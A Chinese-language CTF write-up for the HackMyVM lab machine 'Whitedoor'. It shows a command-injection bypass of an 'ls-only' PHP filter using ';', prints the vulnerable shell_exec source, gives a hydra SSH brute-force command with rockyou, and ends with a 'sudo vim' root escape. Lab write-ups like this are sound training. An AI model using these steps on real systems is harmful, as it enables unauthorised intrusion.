hackmyvm-Whitedoor
https://hackmyvm.eu/machines/machine.php?vm=Quick3
靶机 | 攻击机 | |
---|---|---|
IP | 192.168.101.160 | 192.168.101.183 |
信息收集
基操:
开放了21、22、80端口
htmlspecialchars限制的RCE
访问80端口:
随手测出了一个RCE
但是用其它命令如whoami时发现:
用个; 即可绕过:
然后就是看源码:
ls;cat index.php
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Home</title>
</head>
<body>
<h1></h1>
<!-- Formulario de Comandos -->
<form action="index.php" method="post">
<label for="entrada"></label>
<textarea name="entrada" rows="4" cols="50" required></textarea>
<br>
<button type="submit" name="submit">Send</button>
</form>
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["submit"])) {
$entrada = $_POST["entrada"];
// Permitir solo el comando "ls"
if (preg_match("/^ls\b/i", $entrada)) {
// Mostrar la entrada en la tabla de comandos
echo "<h2></h2>";
echo "<table border='1'>";
echo "<tr><td><pre>" . htmlspecialchars($entrada) . "</pre></td></tr>";
echo "</table>";
// Ejecutar la entrada como comandos
echo "<h2></h2>";
$output = shell_exec($entrada);
echo "<pre>" . htmlspecialchars($output) . "</pre>";
} else {
echo "<p>Permission denied. Only the 'ls' command is allowed.</p>";
}
}
?>
</body>
</html>
注意用到了htmlspecialchars函数,作用是把预定义的字符转换为HTML实体。所以一般弹shell的那些语句可能就用不了了
有哪些用户:
Gonzalo和whiteshell这两个
hydra爆破SSH
接着就可以hydra爆破了:
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.101.160 -V -I -f -u -e nsr
-f为遇到正确的立刻停下来
然后就爆出来了
ssh Gonzalo@192.168.101.160
sudo提权-vim
接下来就是vim提权:
sudo vim
:!/bin/bash
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· .NET10 - 预览版1新功能体验(一)